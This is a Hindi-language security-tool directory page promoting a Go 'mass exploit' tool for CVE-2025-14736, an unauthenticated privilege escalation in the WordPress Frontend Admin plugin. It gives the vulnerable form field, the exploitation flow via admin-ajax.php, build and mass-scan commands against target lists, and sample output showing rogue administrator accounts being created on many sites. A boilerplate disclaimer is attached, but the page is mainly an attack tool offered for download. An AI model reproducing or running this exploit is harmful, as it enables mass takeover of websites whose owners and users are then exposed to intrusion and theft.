Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-14736 — भूमिका फॉर्म फ़ील्ड के माध्यम से बिना प्रमाणीकरण के प्रशासक तक विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/hyunchiya/cve-2025-14736
विशेषाधिकार वृद्धिपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubhyunchiya/cve-2025-14736

CVE-2025-14736

भूमिका फॉर्म फ़ील्ड के माध्यम से बिना प्रमाणीकरण के प्रशासक तक विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
28 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-14736

Frontend Admin by DynamiApps - अप्रमाणित विशेषाधिकार वृद्धि

लेखक: Hyun Chiya


भेद्यता जानकारी

क्षेत्रमान
CVE आईडीCVE-2025-14736
प्लगइनFrontend Admin by DynamiApps
प्रभावित संस्करण<= 3.28.25
भेद्यता प्रकारअप्रमाणित विशेषाधिकार वृद्धि
गंभीरतागंभीर

विवरण

WordPress के लिए Frontend Admin प्लगइन, पंजीकरण के दौरान उपयोगकर्ता-नियंत्रित फ़ील्ड पर अपर्याप्त सत्यापन के कारण अप्रमाणित विशेषाधिकार वृद्धि के लिए संवेदनशील है। हमलावर फ़ॉर्म सबमिशन पेलोड में हेरफेर करके administrator सहित मनमानी भूमिकाएँ इंजेक्ट कर सकते हैं।

मूल कारण विश्लेषण

संवेदनशील तर्क फ़ॉर्म सबमिशन के हैंडलिंग में निहित है जहां role फ़ील्ड को उपयोगकर्ता इनपुट से विश्वसनीय माना जाता है, बिना यह सत्यापित किए कि उपयोगकर्ता उस भूमिका को निर्दिष्ट करने के लिए अधिकृत है या नहीं। विशेष रूप से, फ़ील्ड acff[user][field_user_role_ID] को administrator में संशोधित किया जा सकता है।

शोषण प्रवाह

root@kitploit:~
flowchart TD
    A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
    B --> C["Construct POST payload with 'role'='administrator'"]
    C --> D["POST to /wp-admin/admin-ajax.php"]
    D --> E{"Verification"}
    E -->|Success| F["New Admin User Created"]
    
    style F fill:#ff6b6b,stroke:#c92a2a,color:#fff

पूर्वापेक्षाएँ

  1. लक्ष्य में "Frontend Admin" प्लगइन स्थापित है (संवेदनशील संस्करण)।
  2. एक फ्रंटएंड पंजीकरण फ़ॉर्म सक्षम और सुलभ है।

निर्माण

root@kitploit:~
go build -o mass_exploit.exe mass_exploit.go

उपयोग

बड़े पैमाने पर स्कैन और शोषण

root@kitploit:~
.\mass_exploit.exe -l list.txt -t 50

विकल्प

तर्कविवरण
-lलक्ष्य URL की सूची का पथ (डिफ़ॉल्ट: list.txt)
-tसमवर्ती थ्रेड्स की संख्या (डिफ़ॉल्ट: 10)
-timeoutअनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 15)

उदाहरण आउटपुट

root@kitploit:~
>> [ ONLINE ]    
    ╔═══════════════════════════════════════════════════════════════════════════════════════╗
    ║   CVE-2025-14736 - Mass Exploit Tool                                                  ║
    ║   Frontend Admin by DynamiApps Privilege Escalation                                   ║
    ║   Author: Hyun Chiya                                                                  ║
    ╚═══════════════════════════════════════════════════════════════════════════════════════╝

>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...

[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32

[*] Scan complete.

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। जिम्मेदारी से उपयोग करें।

लेखक

Hyun Chiya

टूल डाउनलोड करें